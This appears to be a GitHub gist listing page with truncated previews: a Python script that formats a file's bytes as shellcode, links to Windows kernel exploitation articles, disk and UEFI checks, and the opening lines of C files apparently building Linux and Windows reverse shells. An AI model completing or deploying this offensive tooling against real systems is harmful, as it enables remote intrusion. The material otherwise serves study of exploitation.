This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import binascii | |
| import sys | |
| file_name = sys.argv[1] | |
| with open (file_name) as f: | |
| hexdata = binascii.hexlify(f.read()) | |
| hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2])) | |
| shellcode = '' | |
| for i in hexlist: | |
| shellcode += "0x{},".format(i) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import binascii | |
| import sys | |
| file_name = sys.argv[1] | |
| with open (file_name) as f: | |
| hexdata = binascii.hexlify(f.read()) | |
| hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2])) | |
| shellcode = '' | |
| for i in hexlist: | |
| shellcode += "0x{},".format(i) |
Windows Kernel Learning: https://mirokaku.github.io/Blog/categories/Windows-kernel-learning/
Journey Into the Object Manager Executive Subsystem: Handles: https://ntamonsec.blogspot.com/2020/06/journey-into-object-manager-executive-handles.html
Random Windows Kernel Articles: https://codemachine.com/articles.html
Journey Into the Object Manager Executive Subsystem: Object Header and Object Type: https://ntamonsec.blogspot.com/2020/05/journey-into-object-manager-executive.html
Windows Exploitation Tricks (All Articles)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| NOTE See Below for version 2 (and updates, erratas, fixes, links, and so on) | |
| NOTE don't assume or think this is the latest because it's on first on top on the list; it's not. | |
| Version 1 'naive approach' (hard coded values, etc) | |
| gcc -g -o L1 lin_1.c | |
| */ | |
| #include <arpa/inet.h> | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #define RP 1234 |
hdparm -I /dev/sda
hdparm -I /dev/sdb
hdparm -I /dev/(some other disk(s))
# verify BOOT mode
# if these dirS exists, then you are in UEFI(and, therefore - you are in the correct place!)
ls /sys/firmware/efi/efivars
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * code inspired and modified from defcon25,MSDocs,StackOverflow | |
| * i686-w64-mingw32-gcc -o win_rsh win_rsh.c -lws2_32 | |
| */ | |
| #include <ws2tcpip.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "ws2_32") | |
| int main(int argc, char *argv[]){ | |
| WSADATA wsaData; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| NOTE See Below for version 2 (and updates, erratas, fixes, links, and so on) | |
| NOTE don't assume or think this is the latest because it's on first on top on the list; it's not. | |
| Version 1 'naive approach' (hard coded values, etc) | |
| gcc -g -o L1 lin_1.c | |
| */ | |
| #include <arpa/inet.h> | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #define RP 1234 |